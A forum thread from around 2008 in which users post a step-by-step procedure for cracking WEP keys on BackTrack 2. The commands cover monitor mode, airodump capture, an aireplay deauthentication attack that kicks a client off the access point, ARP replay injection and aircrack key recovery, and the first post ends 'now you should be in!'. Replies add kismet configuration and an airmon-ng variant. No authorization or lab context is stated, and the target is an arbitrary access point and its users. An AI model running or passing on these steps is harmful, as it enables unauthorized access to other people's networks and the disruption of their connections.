I have got back track 2 and I was confused on eather the syntax of the commands them self or if i just diddent configure everything correctly. So to help others Here is what i have, I run iwconfig and set the wireless card to listen (iwconfig wlan0 mode moniter)
next i need to run kismet (when i run kismet it telles me i need to configure it! and to refer to the .doc **i did not know how/ or where it was**
but thats ok ther is an alternitave, airodump. so i get it all setup (airodump wlan0 dump channel 1)
-new window-
now i need to inject the packets so i can increase the IV's rapidly.
so i (aireplay -0 10 -1 "mac adress of AP" -c "client mac adress" wlan0) {this was to kick the other user off of the ap and re authenticate}
-new window-
now to the injection (aireplay -3 -b "mac adress of AP" -h "client mac adress" -x 500 wlan0)
now the numbers should increase
after a while 500,000 iv's or so later
time to crack them
-new window-
(aircrack -a 1 -b "mac adress of ap" dump.ivs)
this tells air crack that it should be trying to break the key
here is another method to use that is sometimes faster
(aircrack -a 1 -i 1 -n 64 -m "mac aderss of client" -b "mac adress of ap" dump.ivs)
and now you should get a wep key jot it down on a peice of paper reboot to windows and enter the key twice with out the :
and now you should be in!
(if anyone sees anything i need to add or if there is an error please let me know or, edit it thx Exidous)
PS: I need a sig
Edited by on 03-03-08 19:56
Author
RE: BackTrack 2 wep key cracking
Member
Posts: Location: Joined: 01.01.70 Rank: Guest
Posted on 20-06-08 00:33
for you to use kismet on backtrack you have to edit kismet's conf
sudo kedit /usr/local/etc/kismet.conf
find the line, source=none,none,none
which is source=drivername,devicename,namegiven
for example mine is because i use the patched ipwraw drivers:
source=ipw3945,wifi0,Intel
others for example are:
source=ipw3945,eth1,intel
source=orinoco,eth1,kismet
etc.
then kismet will run, and run happy. Lucky you having a card and drivers that inject and enter monitor mode nicely. Few are so fortunate.
Author
RE: BackTrack 2 wep key cracking
Member
Posts: Location: Joined: 01.01.70 Rank: Guest
Posted on 20-06-08 01:07
hmm..
I've never had to get 500K IV's to crack a wep, usually just 50K; I usually go about it kinda like this:
Code
Airmon-ng start rausb0
airodump-ng rasub0
i find the target AP, and a client that is on, then i use client's mac address in an arp attack
then i restart airodump to capture the packets i want
